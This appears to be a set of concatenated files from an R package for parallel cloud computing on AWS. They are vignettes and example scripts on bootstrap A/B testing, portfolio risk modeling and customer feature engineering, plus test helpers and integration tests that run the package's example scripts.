# 
# cat(sprintf("Running %d bootstrap iterations on AWS...\n", n_bootstrap))
# 
# results <- starburst_map(
#   1:n_bootstrap,
#   bootstrap_iteration,
#   data_a = variant_a,
#   data_b = variant_b,
#   workers = 25,
#   cpu = 1,
#   memory = "2GB"
# )

## ----analysis, eval=FALSE-----------------------------------------------------
# # Extract metrics
# diffs <- sapply(results, function(x) x$diff)
# relative_lifts <- sapply(results, function(x) x$relative_lift)
# b_wins <- sapply(results, function(x) x$b_wins)
# 
# # Calculate confidence intervals
# ci_95 <- quantile(diffs, c(0.025, 0.975))
# ci_99 <- quantile(diffs, c(0.005, 0.995))
# 
# # Probability that B is better than A
# prob_b_wins <- mean(b_wins) * 100
# 
# # Print results
# cat("\n=== Bootstrap Results (10,000 iterations) ===\n\n")
# cat(sprintf("Observed difference: %.2f%%\n", observed_diff * 100))
# cat(sprintf("\n95%% Confidence Interval: [%.2f%%, %.2f%%]\n",
#             ci_95[1] * 100, ci_95[2] * 100))
# cat(sprintf("99%% Confidence Interval: [%.2f%%, %.2f%%]\n",
#             ci_99[1] * 100, ci_99[2] * 100))
# cat(sprintf("\nProbability that B > A: %.1f%%\n", prob_b_wins))
# 
# # Statistical significance
# if (ci_95[1] > 0) {
#   cat("\n✓ Result is statistically significant at 95% confidence level\n")
#   cat("  (95% CI does not include zero)\n")
# } else {
#   cat("\n✗ Result is NOT statistically significant at 95% confidence level\n")
#   cat("  (95% CI includes zero)\n")
# }
# 
# # Relative lift analysis
# cat(sprintf("\nRelative lift: %.1f%%\n",
#             median(relative_lifts) * 100))
# cat(sprintf("95%% CI for relative lift: [%.1f%%, %.1f%%]\n",
#             quantile(relative_lifts, 0.025) * 100,
#             quantile(relative_lifts, 0.975) * 100))

## ----viz, eval=FALSE----------------------------------------------------------
# # Create histogram
# hist(diffs * 100,
#      breaks = 50,
#      main = "Bootstrap Distribution of Conversion Rate Difference",
#      xlab = "Difference in Conversion Rate (percentage points)",
#      col = "lightblue",
#      border = "white")
# 
# # Add reference lines
# abline(v = 0, col = "red", lwd = 2, lty = 2)
# abline(v = ci_95 * 100, col = "darkblue", lwd = 2, lty = 2)
# abline(v = observed_diff * 100, col = "darkgreen", lwd = 2)
# 
# # Add legend
# legend("topright",
#        c("Observed difference", "Zero (no effect)", "95% CI"),
#        col = c("darkgreen", "red", "darkblue"),
#        lwd = 2,
#        lty = c(1, 2, 2))

## ----multi-metric, eval=FALSE-------------------------------------------------
# bootstrap_all_metrics <- function(iter, data_a, data_b) {
#   n_a <- length(data_a)
#   n_b <- length(data_b)
# 
#   sample_a <- sample(data_a, n_a, replace = TRUE)
#   sample_b <- sample(data_b, n_b, replace = TRUE)
# 
#   # Multiple metrics
#   rate_a <- mean(sample_a)
#   rate_b <- mean(sample_b)
#   se_a <- sd(sample_a) / sqrt(n_a)
#   se_b <- sd(sample_b) / sqrt(n_b)
# 
#   list(
#     diff_rate = rate_b - rate_a,
#     relative_lift = (rate_b - rate_a) / rate_a,
#     z_score = (rate_b - rate_a) / sqrt(se_a^2 + se_b^2),
#     effect_size = (rate_b - rate_a) / sqrt((var(sample_a) + var(sample_b)) / 2)
#   )
# }
# 
# # Run multi-metric bootstrap
# multi_results <- starburst_map(
#   1:10000,
#   bootstrap_all_metrics,
#   data_a = variant_a,
#   data_b = variant_b,
#   workers = 25
# )

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/bootstrap.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/bootstrap.R", package = "starburst"))

#!/usr/bin/env Rscript
#
# Parallel Portfolio Risk Modeling Example
#
# This script demonstrates parallel risk analysis for a financial portfolio.
# It performs stress testing, VaR calculation, and sensitivity analysis.
#
# Usage:
#   Rscript risk-modeling.R
#   # or from R:
#   source(system.file("examples/risk-modeling.R", package = "starburst"))

library(starburst)

cat("=== Parallel Portfolio Risk Modeling ===\n\n")

# Generate synthetic portfolio
set.seed(3141)

n_assets <- 50

cat("Generating portfolio...\n")

portfolio <- data.frame(
  asset_id = 1:n_assets,
  asset_name = paste0("Asset_", 1:n_assets),
  asset_class = sample(c("Equity", "Bond", "Commodity", "FX", "Option"),
                      n_assets, replace = TRUE,
                      prob = c(0.4, 0.3, 0.1, 0.1, 0.1)),
  position_value = rlnorm(n_assets, log(1000000), 1),
  beta = rnorm(n_assets, 1.0, 0.3),
  duration = ifelse(
    sample(c("Equity", "Bond", "Commodity", "FX", "Option"),
           n_assets, replace = TRUE,
           prob = c(0.4, 0.3, 0.1, 0.1, 0.1)) == "Bond",
    runif(n_assets, 1, 10), 0
  ),
  delta = runif(n_assets, 0.3, 0.7),
  vega = runif(n_assets, 10000, 50000),
  stringsAsFactors = FALSE
)

total_portfolio_value <- sum(portfolio$position_value)

cat(sprintf("✓ Portfolio created:\n"))
cat(sprintf("  Total value: $%.0f\n", total_portfolio_value))
cat(sprintf("  Number of positions: %d\n\n", n_assets))

# Scenario generation functions
generate_stress_scenarios <- function(n_scenarios = 100) {
  scenarios <- list()

  for (i in 1:n_scenarios) {
    scenario <- list(
      scenario_id = i,
      scenario_type = "stress_test",
      equity_shock = rnorm(1, -0.15, 0.05),
      rate_shock = rnorm(1, 0.02, 0.01),
      vol_shock = rnorm(1, 0.5, 0.2),
      fx_shock = rnorm(1, -0.05, 0.03),
      commodity_shock = rnorm(1, -0.10, 0.05)
    )
    scenarios[[i]] <- scenario
  }

  scenarios
}

generate_mc_scenarios <- function(n_scenarios = 1000) {
  scenarios <- list()

  for (i in 1:n_scenarios) {
    scenario <- list(
      scenario_id = 1000 + i,
      scenario_type = "monte_carlo",
      equity_shock = rnorm(1, 0, 0.10),
      rate_shock = rnorm(1, 0, 0.005),
      vol_shock = rnorm(1, 0, 0.2),
      fx_shock = rnorm(1, 0, 0.05),
      commodity_shock = rnorm(1, 0, 0.12)
    )
    scenarios[[i]] <- scenario
  }

  scenarios
}

# Portfolio valuation function
value_portfolio_scenario <- function(scenario, portfolio_data) {
  Sys.sleep(0.001)

  position_pnl <- numeric(nrow(portfolio_data))

  for (i in 1:nrow(portfolio_data)) {
    asset <- portfolio_data[i, ]
    pnl <- 0

    if (asset$asset_class == "Equity") {
      pnl <- asset$position_value * scenario$equity_shock * asset$beta
    } else if (asset$asset_class == "Bond") {
      pnl <- -asset$position_value * scenario$rate_shock * asset$duration
    } else if (asset$asset_class == "Commodity") {
      pnl <- asset$position_value * scenario$commodity_shock
    } else if (asset$asset_class == "FX") {
      pnl <- asset$position_value * scenario$fx_shock
    } else if (asset$asset_class == "Option") {
      pnl <- asset$position_value * scenario$equity_shock * asset$delta +
             asset$vega * scenario$vol_shock
    }

    position_pnl[i] <- pnl
  }

  total_pnl <- sum(position_pnl)
  portfolio_return <- total_pnl / sum(portfolio_data$position_value)

  list(
    scenario_id = scenario$scenario_id,
    scenario_type = scenario$scenario_type,
    total_pnl = total_pnl,
    portfolio_return = portfolio_return,
    position_pnl = position_pnl
  )
}

# Local benchmark
test_stress <- generate_stress_scenarios(n_scenarios = 20)
test_mc <- generate_mc_scenarios(n_scenarios = 100)
test_scenarios <- c(test_stress, test_mc)

cat(sprintf("Running local benchmark (%d scenarios)...\n", length(test_scenarios)))
local_start <- Sys.time()

local_results <- lapply(test_scenarios, value_portfolio_scenario,
                       portfolio_data = portfolio)

local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("✓ Completed in %.2f seconds\n", local_time))
cat(sprintf("  Average time per scenario: %.3f seconds\n",
            local_time / length(test_scenarios)))
cat(sprintf("  Estimated time for 10,000 scenarios: %.1f minutes\n\n",
            local_time * 10000 / length(test_scenarios) / 60))

# Generate full scenario set
cat("Generating scenario sets...\n")
stress_scenarios <- generate_stress_scenarios(n_scenarios = 100)
mc_scenarios <- generate_mc_scenarios(n_scenarios = 10000)

all_scenarios <- c(stress_scenarios, mc_scenarios)

cat(sprintf("  Stress test scenarios: %d\n", length(stress_scenarios)))
cat(sprintf("  Monte Carlo scenarios: %s\n",
            format(length(mc_scenarios), big.mark = ",")))
cat(sprintf("  Total scenarios: %s\n\n",
            format(length(all_scenarios), big.mark = ",")))

# Cloud execution
n_workers <- 50

cat(sprintf("Running risk analysis (%s scenarios) on %d workers...\n",
            format(length(all_scenarios), big.mark = ","), n_workers))

cloud_start <- Sys.time()

results <- starburst_map(
  all_scenarios,
  value_portfolio_scenario,
  portfolio_data = portfolio,
  workers = n_workers,
  cpu = 2,
  memory = "4GB"
)

cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "mins"))

cat(sprintf("\n✓ Completed in %.2f minutes\n\n", cloud_time))

# Extract P&L values
pnl_values <- sapply(results, function(x) x$total_pnl)
stress_pnl <- pnl_values[1:100]
mc_pnl <- pnl_values[101:length(pnl_values)]

# Print results
cat("=== Comprehensive Risk Analysis Results ===\n\n")

# Stress test results
cat("=== Stress Test Results ===\n")
cat(sprintf("Worst case loss: $%.0f (%.2f%%)\n",
            min(stress_pnl),
            min(stress_pnl) / total_portfolio_value * 100))
cat(sprintf("Average stress loss: $%.0f (%.2f%%)\n",
            mean(stress_pnl),
            mean(stress_pnl) / total_portfolio_value * 100))
cat(sprintf("Best case: $%.0f (%.2f%%)\n\n",
            max(stress_pnl),
            max(stress_pnl) / total_portfolio_value * 100))

# Value at Risk
cat("=== Value at Risk (Monte Carlo) ===\n")
var_95 <- quantile(mc_pnl, 0.05)
var_99 <- quantile(mc_pnl, 0.01)
var_999 <- quantile(mc_pnl, 0.001)

cat(sprintf("VaR (95%%): $%.0f (%.2f%%)\n",
            -var_95, -var_95 / total_portfolio_value * 100))
cat(sprintf("VaR (99%%): $%.0f (%.2f%%)\n",
            -var_99, -var_99 / total_portfolio_value * 100))
cat(sprintf("VaR (99.9%%): $%.0f (%.2f%%)\n\n",
            -var_999, -var_999 / total_portfolio_value * 100))

# Expected Shortfall
cat("=== Expected Shortfall (CVaR) ===\n")
es_95 <- mean(mc_pnl[mc_pnl <= var_95])
es_99 <- mean(mc_pnl[mc_pnl <= var_99])

cat(sprintf("ES (95%%): $%.0f (%.2f%%)\n",
            -es_95, -es_95 / total_portfolio_value * 100))
cat(sprintf("ES (99%%): $%.0f (%.2f%%)\n\n",
            -es_99, -es_99 / total_portfolio_value * 100))

# Portfolio statistics
cat("=== Portfolio Statistics ===\n")
cat(sprintf("Mean P&L: $%.0f\n", mean(mc_pnl)))
cat(sprintf("Std Dev P&L: $%.0f\n", sd(mc_pnl)))
cat(sprintf("Skewness: %.3f\n",
            mean((mc_pnl - mean(mc_pnl))^3) / sd(mc_pnl)^3))
cat(sprintf("Probability of loss: %.2f%%\n\n",
            mean(mc_pnl < 0) * 100))

# Regulatory metrics
cat("=== Regulatory Metrics ===\n")
market_risk_capital <- -var_99 * 3
cat(sprintf("Market Risk Capital Requirement: $%.0f\n", market_risk_capital))
cat(sprintf("Capital as %% of Portfolio: %.2f%%\n\n",
            market_risk_capital / total_portfolio_value * 100))

# Performance comparison
cat("=== Performance Comparison ===\n\n")
estimated_local <- local_time * length(all_scenarios) / length(test_scenarios) / 60
speedup <- estimated_local / cloud_time
cat(sprintf("Local (estimated): %.1f minutes\n", estimated_local))
cat(sprintf("Cloud (%d workers): %.2f minutes\n", n_workers, cloud_time))
cat(sprintf("Speedup: %.1fx\n", speedup))

cat("\n✓ Done!\n")

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)
# library(dplyr)

## ----data, eval=FALSE---------------------------------------------------------
# set.seed(123)
# 
# # Generate 100,000 transactions for 5,000 customers
# n_customers <- 5000
# n_transactions <- 100000
# 
# transactions <- data.frame(
#   customer_id = sample(1:n_customers, n_transactions, replace = TRUE),
#   transaction_date = as.Date("2023-01-01") + sample(0:364, n_transactions, replace = TRUE),
#   amount = exp(rnorm(n_transactions, log(50), 0.8)),  # Log-normal distribution
#   category = sample(c("groceries", "electronics", "clothing", "restaurants", "other"),
#                    n_transactions, replace = TRUE, prob = c(0.4, 0.1, 0.2, 0.2, 0.1)),
#   payment_method = sample(c("credit", "debit", "cash"), n_transactions, replace = TRUE),
#   is_online = sample(c(TRUE, FALSE), n_transactions, replace = TRUE, prob = c(0.3, 0.7))
# )
# 
# # Sort by customer and date
# transactions <- transactions[order(transactions$customer_id, transactions$transaction_date), ]
# 
# cat(sprintf("Dataset: %s transactions for %s customers\n",
#             format(nrow(transactions), big.mark = ","),
#             format(length(unique(transactions$customer_id)), big.mark = ",")))
# cat(sprintf("Date range: %s to %s\n",
#             min(transactions$transaction_date),
#             max(transactions$transaction_date)))

## ----features-fn, eval=FALSE--------------------------------------------------
# engineer_features <- function(customer_ids, transactions_data) {
#   # Filter to specified customers
#   customer_data <- transactions_data[transactions_data$customer_id %in% customer_ids, ]
# 
#   if (nrow(customer_data) == 0) {
#     return(NULL)
#   }
# 
#   # Sort by customer and date
#   customer_data <- customer_data[order(customer_data$customer_id,
#                                       customer_data$transaction_date), ]
# 
#   # Compute features for each customer
#   features_list <- lapply(customer_ids, function(cid) {
#     cust_txn <- customer_data[customer_data$customer_id == cid, ]
# 
#     if (nrow(cust_txn) == 0) {
#       return(NULL)
#     }
# 
#     # Basic statistics
#     total_transactions <- nrow(cust_txn)
#     total_spend <- sum(cust_txn$amount)
#     avg_transaction <- mean(cust_txn$amount)
# 
#     # Time-based features
#     first_purchase <- min(cust_txn$transaction_date)
#     last_purchase <- max(cust_txn$transaction_date)
#     days_active <- as.numeric(difftime(last_purchase, first_purchase, units = "days"))
#     purchase_frequency <- if (days_active > 0) total_transactions / days_active else 0
# 
#     # Rolling statistics (last 30 days)
#     recent_cutoff <- last_purchase - 30
#     recent_txn <- cust_txn[cust_txn$transaction_date > recent_cutoff, ]
#     recent_spend <- if (nrow(recent_txn) > 0) sum(recent_txn$amount) else 0
#     recent_count <- nrow(recent_txn)
# 
#     # Category preferences
#     category_counts <- table(cust_txn$category)
#     favorite_category <- names(category_counts)[which.max(category_counts)]
#     category_diversity <- length(unique(cust_txn$category))
# 
#     # Payment behavior
#     online_pct <- mean(cust_txn$is_online) * 100
#     credit_pct <- mean(cust_txn$payment_method == "credit") * 100
# 
#     # Volatility metrics
#     amount_sd <- sd(cust_txn$amount)
#     amount_cv <- amount_sd / avg_transaction  # Coefficient of variation
# 
#     # Time patterns
#     weekday <- as.POSIXlt(cust_txn$transaction_date)$wday
#     weekend_pct <- mean(weekday %in% c(0, 6)) * 100
# 
#     # RFM features (Recency, Frequency, Monetary)
#     recency <- as.numeric(difftime(as.Date("2024-01-01"), last_purchase, units = "days"))
# 
#     data.frame(
#       customer_id = cid,
#       total_transactions = total_transactions,
#       total_spend = total_spend,
#       avg_transaction = avg_transaction,
#       days_active = days_active,
#       purchase_frequency = purchase_frequency,
#       recent_spend_30d = recent_spend,
#       recent_count_30d = recent_count,
#       favorite_category = favorite_category,
#       category_diversity = category_diversity,
#       online_pct = online_pct,
#       credit_pct = credit_pct,
#       amount_sd = amount_sd,
#       amount_cv = amount_cv,
#       weekend_pct = weekend_pct,
#       recency_days = recency,
#       stringsAsFactors = FALSE
#     )
#   })
# 
#   # Combine results
#   do.call(rbind, features_list[!sapply(features_list, is.null)])
# }

## ----local, eval=FALSE--------------------------------------------------------
# # Process 500 customers locally
# set.seed(456)
# sample_customers <- sample(unique(transactions$customer_id), 500)
# 
# cat(sprintf("Processing features for %d customers locally...\n", length(sample_customers)))
# local_start <- Sys.time()
# 
# local_features <- engineer_features(sample_customers, transactions)
# 
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
# 
# cat(sprintf("[OK] Completed in %.2f seconds\n", local_time))
# cat(sprintf("  Generated %d features per customer\n", ncol(local_features) - 1))
# cat(sprintf("  Estimated time for all %s customers: %.1f minutes\n",
#             format(n_customers, big.mark = ","),
#             local_time * (n_customers / 500) / 60))

## ----cloud, eval=FALSE--------------------------------------------------------
# # Split customers into chunks
# all_customers <- unique(transactions$customer_id)
# n_workers <- 20
# 
# cat(sprintf("Processing features for %s customers on %d workers...\n",
#             format(length(all_customers), big.mark = ","),
#             n_workers))
# 
# # Create chunks of customer IDs
# chunk_size <- ceiling(length(all_customers) / n_workers)
# customer_chunks <- split(all_customers,
#                         ceiling(seq_along(all_customers) / chunk_size))
# 
# cloud_start <- Sys.time()
# 
# # Process chunks in parallel
# results <- starburst_map(
#   customer_chunks,
#   engineer_features,
#   transactions_data = transactions,
#   workers = n_workers,
#   cpu = 2,
#   memory = "4GB"
# )
# 
# cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))
# 
# cat(sprintf("\n[OK] Completed in %.1f seconds\n", cloud_time))
# 
# # Combine results
# features <- do.call(rbind, results)

## ----analysis, eval=FALSE-----------------------------------------------------
# cat("\n=== Feature Engineering Results ===\n\n")
# cat(sprintf("Total customers processed: %s\n",
#             format(nrow(features), big.mark = ",")))
# cat(sprintf("Features generated per customer: %d\n", ncol(features) - 1))
# cat(sprintf("\nFeature names:\n"))
# print(names(features)[names(features) != "customer_id"])
# 
# # Summary statistics
# cat("\n=== Feature Summary Statistics ===\n\n")
# cat(sprintf("Average transactions per customer: %.1f\n",
#             mean(features$total_transactions)))
# cat(sprintf("Average total spend: $%.2f\n",
#             mean(features$total_spend)))
# cat(sprintf("Average transaction value: $%.2f\n",
#             mean(features$avg_transaction)))
# cat(sprintf("\nMost common category: %s\n",
#             names(sort(table(features$favorite_category), decreasing = TRUE)[1])))
# cat(sprintf("Average category diversity: %.1f categories\n",
#             mean(features$category_diversity)))
# cat(sprintf("\nAverage online purchase rate: %.1f%%\n",
#             mean(features$online_pct)))
# cat(sprintf("Average credit card usage: %.1f%%\n",
#             mean(features$credit_pct)))
# cat(sprintf("\nMean purchase frequency: %.3f transactions/day\n",
#             mean(features$purchase_frequency, na.rm = TRUE)))
# cat(sprintf("Mean recency: %.0f days since last purchase\n",
#             mean(features$recency_days)))
# 
# # Identify high-value segments
# high_value <- features[features$total_spend > quantile(features$total_spend, 0.9), ]
# cat(sprintf("\n=== Top 10%% Customers (by spend) ===\n"))
# cat(sprintf("Count: %d customers\n", nrow(high_value)))
# cat(sprintf("Average total spend: $%.2f\n", mean(high_value$total_spend)))
# cat(sprintf("Average transactions: %.1f\n", mean(high_value$total_transactions)))
# cat(sprintf("Average online rate: %.1f%%\n", mean(high_value$online_pct)))

## ----ml-features, eval=FALSE--------------------------------------------------
# engineer_ml_features <- function(customer_ids, transactions_data) {
#   base_features <- engineer_features(customer_ids, transactions_data)
# 
#   if (is.null(base_features)) {
#     return(NULL)
#   }
# 
#   # Add derived features for ML
#   base_features$clv_estimate <- base_features$avg_transaction *
#                                  base_features$purchase_frequency * 365
#   base_features$engagement_score <- scale(base_features$total_transactions) +
#                                     scale(base_features$category_diversity)
#   base_features$recency_score <- -scale(base_features$recency_days)
#   base_features$is_high_value <- base_features$total_spend >
#                                   median(base_features$total_spend)
#   base_features$purchase_momentum <- base_features$recent_count_30d /
#                                      (base_features$total_transactions + 1)
# 
#   base_features
# }
# 
# # Process with enhanced features
# ml_results <- starburst_map(
#   customer_chunks,
#   engineer_ml_features,
#   transactions_data = transactions,
#   workers = 20,
#   cpu = 2,
#   memory = "4GB"
# )
# 
# ml_features <- do.call(rbind, ml_results)

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/feature-engineering.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/feature-engineering.R", package = "starburst"))

# Helper functions for AWS testing

#' Skip test if AWS credentials not available
skip_if_no_aws <- function() {
  has_creds <- tryCatch({
    # Try to get AWS credentials
    Sys.getenv("AWS_PROFILE") != "" ||
      (Sys.getenv("AWS_ACCESS_KEY_ID") != "" &&
       Sys.getenv("AWS_SECRET_ACCESS_KEY") != "")
  }, error = function(e) FALSE)

  if (!has_creds) {
    skip("AWS credentials not available")
  }
}

#' Skip test if not in CI/CD environment
skip_if_not_ci <- function() {
  is_ci <- Sys.getenv("CI") == "true" ||
           Sys.getenv("GITHUB_ACTIONS") == "true"

  if (!is_ci) {
    skip("Not in CI environment")
  }
}

#' Check if AWS integration tests should run
can_run_aws_tests <- function() {
  !identical(Sys.getenv("STARBURST_SKIP_AWS_TESTS"), "true") &&
    (Sys.getenv("AWS_PROFILE") != "" ||
     (Sys.getenv("AWS_ACCESS_KEY_ID") != "" &&
      Sys.getenv("AWS_SECRET_ACCESS_KEY") != ""))
}

#' Skip unless integration tests are explicitly enabled
#'
#' Strong, default-off gate for tests that provision real infrastructure
#' (e.g. launch Fargate workers or build Docker images). Having AWS
#' credentials present is not enough to opt in -- RUN_INTEGRATION_TESTS must
#' be set to "TRUE" -- so these tests never fire unattended during
#' devtools::test() or R CMD check.
skip_if_no_integration <- function() {
  testthat::skip_if_not(
    Sys.getenv("RUN_INTEGRATION_TESTS") == "TRUE",
    "Integration tests disabled. Set RUN_INTEGRATION_TESTS=TRUE to enable."
  )
}

# Integration Tests Using Examples
#
# These tests run the example scripts to validate end-to-end functionality.
# Set RUN_INTEGRATION_TESTS=TRUE to enable (skipped by default).
# Set USE_STARBURST=TRUE to test with AWS (otherwise tests local execution).
#
# skip_if_no_integration() is defined in helper-aws.R (shared across test files).

# Helper to get package root directory (tests run from tests/testthat/)
get_pkg_root <- function() {
  if (basename(getwd()) == "testthat") {
    normalizePath("../..")
  } else if (file.exists("tests/testthat")) {
    getwd()
  } else {
    stop("Cannot determine package root")
  }
}

test_that("Monte Carlo example runs locally", {
  skip_if_no_integration()

  pkg_root <- get_pkg_root()

  # Run example without staRburst (run from pkg_root so results write there)
  result <- withr::with_dir(pkg_root, {
    withr::with_envvar(
      c(USE_STARBURST = "FALSE"),
      system2(
        "Rscript",
        args = c("examples/01-monte-carlo-portfolio.R"),
        stdout = TRUE,
        stderr = TRUE
      )
    )
  })

  expect_equal(attr(result, "status"), NULL)  # NULL status = success (0)
  expect_true(file.exists(file.path(pkg_root, "monte-carlo-results-local.rds")))

  # Verify results structure
  results <- readRDS(file.path(pkg_root, "monte-carlo-results-local.rds"))
  expect_type(results$results, "list")
  expect_true(results$elapsed > 0)
  expect_equal(results$mode, "local")

  # Cleanup
  unlink(file.path(pkg_root, "monte-carlo-results-local.rds"))
})

test_that("Monte Carlo example runs with staRburst", {
  skip_if_no_integration()
  skip_if_not(
    Sys.getenv("USE_STARBURST") == "TRUE",
    "AWS tests disabled. Set USE_STARBURST=TRUE to enable."
  )

  pkg_root <- get_pkg_root()

  # Run example with staRburst
  result <- withr::with_envvar(
    c(
      USE_STARBURST = "TRUE",
      STARBURST_WORKERS = "10",  # Small worker count for testing
      AWS_PROFILE = Sys.getenv("AWS_PROFILE", "aws")
    ),
    system2(
      "Rscript",
      args = c(file.path(pkg_root, "examples/01-monte-carlo-portfolio.R")),
      stdout = TRUE,
      stderr = TRUE
    )
  )

  expect_equal(attr(result, "status"), NULL)
  expect_true(file.exists(file.path(pkg_root, "monte-carlo-results-aws.rds")))

  # Verify results structure
  results <- readRDS(file.path(pkg_root, "monte-carlo-results-aws.rds"))
  expect_type(results$results, "list")
  expect_true(results$elapsed > 0)
  expect_equal(results$mode, "aws")
  expect_equal(results$workers, 10)

  # Cleanup
  unlink(file.path(pkg_root, "monte-carlo-results-aws.rds"))
})

test_that("Bootstrap example runs locally", {
  skip_if_no_integration()

  pkg_root <- get_pkg_root()

  result <- withr::with_dir(pkg_root, {
    withr::with_envvar(
      c(USE_STARBURST = "FALSE"),
      system2(
        "Rscript",
        args = c("examples/02-bootstrap-confidence-intervals.R"),
        stdout = TRUE,
        stderr = TRUE
      )
    )
  })

  expect_equal(attr(result, "status"), NULL)
  expect_true(file.exists(file.path(pkg_root, "bootstrap-results-local.rds")))

  results <- readRDS(file.path(pkg_root, "bootstrap-results-local.rds"))
  expect_type(results$boot_results, "list")
  expect_length(results$ci, 2)
  expect_true(results$ci[1] < results$ci[2])

  unlink(file.path(pkg_root, "bootstrap-results-local.rds"))
})

test_that("Bootstrap example runs with staRburst", {
  skip_if_no_integration()
  skip_if_not(Sys.getenv("USE_STARBURST") == "TRUE")

  pkg_root <- get_pkg_root()

  result <- withr::with_dir(pkg_root, {
    withr::with_envvar(
      c(
        USE_STARBURST = "TRUE",
        STARBURST_WORKERS = "10",
        AWS_PROFILE = Sys.getenv("AWS_PROFILE", "aws")
      ),
      system2(
        "Rscript",
        args = c("examples/02-bootstrap-confidence-intervals.R"),
        stdout = TRUE,
        stderr = TRUE
      )
    )
  })

  expect_equal(attr(result, "status"), NULL)
  expect_true(file.exists(file.path(pkg_root, "bootstrap-results-aws.rds")))

  unlink(file.path(pkg_root, "bootstrap-results-aws.rds"))
})

test_that("Data processing example runs locally", {
  skip_if_no_integration()

  pkg_root <- get_pkg_root()

  result <- withr::with_dir(pkg_root, {
    withr::with_envvar(
      c(USE_STARBURST = "FALSE"),
      system2(
        "Rscript",
        args = c("examples/03-parallel-data-processing.R"),
        stdout = TRUE,
        stderr = TRUE
      )
    )
  })

  expect_equal(attr(result, "status"), NULL)
  expect_true(file.exists(file.path(pkg_root, "processing-results-local.rds")))

  results <- readRDS(file.path(pkg_root, "processing-results-local.rds"))
  expect_type(results$chunk_stats, "list")
  expect_true(length(results$chunk_stats) > 0)

  unlink(file.path(pkg_root, "processing-results-local.rds"))
})

test_that("Data processing example runs with staRburst", {
  skip_if_no_integration()
  skip_if_not(Sys.getenv("USE_STARBURST") == "TRUE")

  pkg_root <- get_pkg_root()

  result <- withr::with_dir(pkg_root, {
    withr::with_envvar(
      c(
        USE_STARBURST = "TRUE",
        STARBURST_WORKERS = "10",
        AWS_PROFILE = Sys.getenv("AWS_PROFILE", "aws")
      ),
      system2(
        "Rscript",
        args = c("examples/03-parallel-data-processing.R"),
        stdout = TRUE,
        stderr = TRUE
      )
    )
  })

  expect_equal(attr(result, "status"), NULL)
  expect_true(file.exists(file.path(pkg_root, "processing-results-aws.rds")))

  unlink(file.path(pkg_root, "processing-results-aws.rds"))
})

test_that("Grid search example runs locally", {
  skip_if_no_integration()

  pkg_root <- get_pkg_root()

  result <- withr::with_dir(pkg_root, {
    withr::with_envvar(
      c(USE_STARBURST = "FALSE"),
      system2(
        "Rscript",
        args = c("examples/04-grid-search-tuning.R"),
        stdout = TRUE,
        stderr = TRUE
      )
    )
  })

  expect_equal(attr(result, "status"), NULL)
  expect_true(file.exists(file.path(pkg_root, "grid-search-results-local.rds")))

  results <- readRDS(file.path(pkg_root, "grid-search-results-local.rds"))
  expect_type(results$results, "list")
  expect_type(results$best_params, "list")
  expect_true(results$best_params$cv_score > 0)

  unlink(file.path(pkg_root, "grid-search-results-local.rds"))
})

test_that("Grid search example runs with staRburst", {
  skip_if_no_integration()
  skip_if_not(Sys.getenv("USE_STARBURST") == "TRUE")

  pkg_root <- get_pkg_root()

  result <- withr::with_dir(pkg_root, {
    withr::with_envvar(
      c(
        USE_STARBURST = "TRUE",
        STARBURST_WORKERS = "10",
        AWS_PROFILE = Sys.getenv("AWS_PROFILE", "aws")
      ),
      system2(
        "Rscript",
        args = c("examples/04-grid-search-tuning.R"),
        stdout = TRUE,
        stderr = TRUE
      )
    )
  })

  expect_equal(attr(result, "status"), NULL)
  expect_true(file.exists(file.path(pkg_root, "grid-search-results-aws.rds")))

  unlink(file.path(pkg_root, "grid-search-results-aws.rds"))
})

test_that("All examples produce consistent results", {
  skip_if_no_integration()
  skip_if_not(Sys.getenv("USE_STARBURST") == "TRUE")

  pkg_root <- get_pkg_root()

  # This test verifies that AWS and local execution produce similar results
  # (within statistical tolerance for random processes)

  # Run Monte Carlo both ways with same seed
  withr::with_dir(pkg_root, {
    withr::with_envvar(
      c(USE_STARBURST = "FALSE"),
      system2(
        "Rscript",
        args = c("examples/01-monte-carlo-portfolio.R"),
        stdout = FALSE,
        stderr = FALSE
      )
    )
  })

  withr::with_dir(pkg_root, {
    withr::with_envvar(
      c(
        USE_STARBURST = "TRUE",
        STARBURST_WORKERS = "10",
        AWS_PROFILE = Sys.getenv("AWS_PROFILE", "aws")
      ),
      system2(
        "Rscript",
        args = c("examples/01-monte-carlo-portfolio.R"),
        stdout = FALSE,
        stderr = FALSE
      )
    )
  })

  # Compare results (should be statistically similar)
  local <- readRDS(file.path(pkg_root, "monte-carlo-results-local.rds"))
  aws <- readRDS(file.path(pkg_root, "monte-carlo-results-aws.rds"))

  local_means <- sapply(local$results, function(x) x$final_value)
  aws_means <- sapply(aws$results, function(x) x$final_value)

  # Results should be highly correlated (same random seeds)
  expect_true(cor(local_means, aws_means) > 0.99)

  # Cleanup
  unlink(c(
    file.path(pkg_root, "monte-carlo-results-local.rds"),
    file.path(pkg_root, "monte-carlo-results-aws.rds")
  ))
})

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)
# library(httr)
# library(jsonlite)

## ----api-function, eval=FALSE-------------------------------------------------
# fetch_company_data <- function(ticker) {
#   # Add small delay to respect rate limits
#   Sys.sleep(runif(1, 0.1, 0.3))
# 
#   # For demo purposes, we'll use a public API
#   # In practice, replace with your actual API endpoint
#   base_url <- "https://api.example.com/company"
# 
#   tryCatch({
#     # Fetch company info
#     response <- httr::GET(
#       paste0(base_url, "/", ticker),
#       httr::timeout(10),
#       httr::add_headers(
#         "User-Agent" = "staRburst-example/1.0"
#       )
#     )
# 
#     # Check for success
#     if (httr::status_code(response) == 200) {
#       data <- httr::content(response, "parsed")
# 
#       # Extract relevant fields
#       list(
#         ticker = ticker,
#         success = TRUE,
#         company_name = data$name %||% NA,
#         market_cap = data$marketCap %||% NA,
#         pe_ratio = data$peRatio %||% NA,
